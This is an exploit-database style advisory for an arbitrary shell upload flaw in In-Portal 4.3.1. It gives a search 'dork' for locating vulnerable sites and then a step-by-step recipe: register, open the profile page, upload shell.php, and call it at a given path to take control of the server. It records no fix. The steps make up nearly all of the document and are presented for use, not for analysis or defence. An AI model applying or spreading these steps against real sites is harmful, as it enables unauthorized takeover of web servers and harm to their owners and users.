In-Portal 4.3.1 Arbitrary Shell Upload Vulnerability

2009-07-28 19:01:59

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :In-Portal v 4.3.1 Shell Upload Vulnerability

[+] D0rk : Powered by In-portal ® 1997-2009,

[+] Script site : www.in-portal.net

[+] Found by : Mr.tro0oqy

[+] C0ntact : [email protected] <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
step1: register in site

http://www.xxx.com/path/platform/login/register.html

step2: go to your profile

http://www.xxx.com/path/platform/my_account/my_profile.html

step3: upload shell.php

step4: get shell

http://www.xxx.com/path/kernel/images/shell.php


Demo:
-----
http://www.in-portal.net/demo
-----




Yemeni ana ;)

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.